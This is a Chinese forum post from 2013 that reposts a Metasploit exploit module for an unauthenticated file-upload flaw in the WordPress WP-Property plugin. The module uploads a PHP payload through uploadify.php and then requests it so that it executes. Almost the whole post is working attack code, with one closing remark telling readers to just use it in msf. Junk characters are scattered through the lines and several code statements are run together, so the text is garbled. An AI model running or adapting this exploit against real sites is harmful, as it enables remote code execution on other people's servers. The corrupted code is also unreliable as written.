WordPress WP-Property PHP 文件上传漏洞# \; O; c! M- C& t
9 [, z* f I. r: }* t ## # This file is part of the Metasploit Framework and may be subject to
9 b( j" e) `, ~, w8 Y5 D( I5 R, I3 t+ ]3 `
# redistribution and commercial restrictions. Please see the Metasploit
: h5 W4 D ] ~0 R9 L
- A: o$ W# r4 c# Framework web site for more information on licensing and terms of use.1 ~% R6 k; A; L! C" P! h0 ^
; w8 q2 v7 t* x( E; {# http://metasploit.com/framework/ ##* W& A' q0 i' G8 f
, F+ \! j7 S% \7 ~4 T" M# M* J3 n
. o2 t0 Q% P) Z: z7 P2 ^/ t. r
- s4 R) f) n2 H; |, y * Y& G# W0 M# ^7 l8 J* V
7 j% F4 f( @: \, j& f* N" |* l. c
require 'msf/core'
8 Y; K) { [2 a, {7 S; nrequire 'msf/core/exploit/php_exe'+ Y& s) F2 [% ^- d( d1 M! b* G
. s9 `1 \5 Q/ R& {
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',1 h/ P( D0 |+ ~6 W
'Description' => %q{- `% h+ N$ l6 Z# T& m
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>! l5 s% U" x8 ~* e# L7 f# {
[" l. R2 U- u0 i! {
'Sammy FORGIT', # initial discovery
( j$ q. ]# N2 C" N5 J'James Fitts <fitts.james[at]gmail.com>' # metasploit module, Q% k3 W! Q; h4 k6 v1 b) L5 l: i
],
2 @+ m5 {4 T7 }'License' => MSF_LICENSE,: V0 ^$ R. C* O m. [
'References' =># ]4 L3 s8 ]: P
[
% D% J# A# ?" K( L[ 'OSVDB', '82656' ],
) v. t" [! x- G, |7 P[ 'BID', '53787' ],3 J, [! c/ q7 }( T' G4 Y2 t1 L7 i( q6 a5 y
[ 'EDB', '18987'],9 `. m6 r B. F9 P+ j
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]) b# v7 Y0 h! c' L& p
],6 ~9 {5 A9 a0 q
'Payload' =>3 r5 F1 G# v0 h0 _. y/ h
{
% p1 R+ S, ?& _- G& L2 s8 Y'BadChars' => "\x00",
' T; i9 e" o- `. ~/ f},: d3 a+ p4 J, C' @* [
'Platform' => 'php',9 A/ r @1 w+ s/ \: R U
'Arch' => ARCH_PHP,
3 q; \& f5 V; U0 h' p }1 v'Targets' =>
7 j& ~5 \* Y( j3 A& P[
5 m5 s0 [! q4 u9 W% @; b Z: \[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
0 |2 }) W; d- Q0 X r+ M[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
8 ]7 ~$ s4 _0 b9 b/ d, E],0 C* k2 C3 `0 X( n# b
'DefaultTarget' => 0,
0 [# x2 m# L' _: n1 {& X$ K'DisclosureDate' => 'Mar 26 2012'))$ B: E1 i8 Z* r
3 t" r# l" B4 s. [& ?register_options(' V( [5 ^, c) }8 z
[3 b# M% i1 C$ c% R) i
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
/ ?0 M& m0 r$ `/ G" O& V( f# A], self.class)
, ^5 [* @, o: V; Z) ?end, ^, Z* `/ e# }9 x5 U: E& u( E
9 `9 y, L' Q5 u" o) m# m4 Y
def check
& B! {+ B3 c2 n( \uri = target_uri.path0 @# Z3 d Q# S
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
; k& d( X1 t) E) F'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php") F% A2 [7 ]. t( ? \! @. Z
})2 P9 S; d i Y4 t
- f. S% E/ Y5 _, k
if not res or res.code != 200
/ I; P) S& @* d+ q1 Z: Freturn Exploit::CheckCode::Unknown" C8 }& m5 Z0 o8 l3 i
end
1 P& v9 g7 e: Q0 S5 R2 Q; T/ j+ k1 {/ e5 a9 b1 h5 P; L3 S! Y9 o; ?
return Exploit::CheckCode::Appears
% k0 r' b) v" Q5 z- j! Kend
a8 ~; r q7 [0 Z. Z- v7 P! K* ]+ R# h d
def exploit
+ |! q9 k- i3 X9 Y/ d$ Ouri = target_uri.path9 A3 I6 K) r/ X, P
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
. ^- X3 f3 U/ Q* ^! b; y0 K9 \7 d
! k o, n0 q, Wdata = Rex::MIME::Message.new
: Y) O4 b7 o' xdata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""): o2 n: \0 O0 [. O A* F z; v! p
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
* [- X5 L& Y; `8 c- F* v rpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_'): ?# `6 z6 }& c' N/ O3 p
$ u4 A% v! ^8 k& ?
print_status("#{peer} - Uploading payload #{@payload_name}"); V1 L5 E$ R2 j3 M' Q7 s, [
res = send_request_cgi({
, g# Y M; Y+ Q1 K( g: v'method' => 'POST',
5 ]' @% c; ^( ? H H/ \'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
1 J+ A, m# E( R' j# V'ctype' => "multipart/form-data; boundary=#{data.bound}",2 B) B* G. H6 ]; w1 S; `: z* k
'data' => post_data
: Q1 `5 S4 S& X, l$ ?, m2 d/ z})1 `. n; [+ i+ @' ~) V9 {; q+ k
# h) n& c( M S8 E% i* y
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
3 y* N" r7 G. Q$ M O# _fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")0 ^2 u# \- T1 U# A3 i
end
: v: ?% ? a; g4 Z
& U, f! G4 S. M2 f% Q' G3 Iupload_uri = res.body
1 H3 x/ R, r5 N7 |9 n7 V1 `0 o7 y- V6 q& e* w3 U- b- {
print_status("#{peer} - Executing payload #{@payload_name}")
0 r1 S: P8 I- s: t: z- dres = send_request_raw({" P! E4 H) H' K
'uri' => upload_uri,
. s! X! H2 L& `'method' => 'GET'
9 K# ^: i" s8 {/ Q})4 x. ~" `* o9 g9 K
end
: |3 b1 `% {4 X6 \end
2 L5 {7 ?. U' K, p7 `; o. k7 R5 V6 ^5 P. u
不要问我这写的是什么 怎么利用 我是说msf.! W0 h6 d' I# P" ?5 o8 x
3 @9 C8 h% d: ?, c4 }6 i |
发表于 2013-1-4 19:51:30
收藏
支持
反对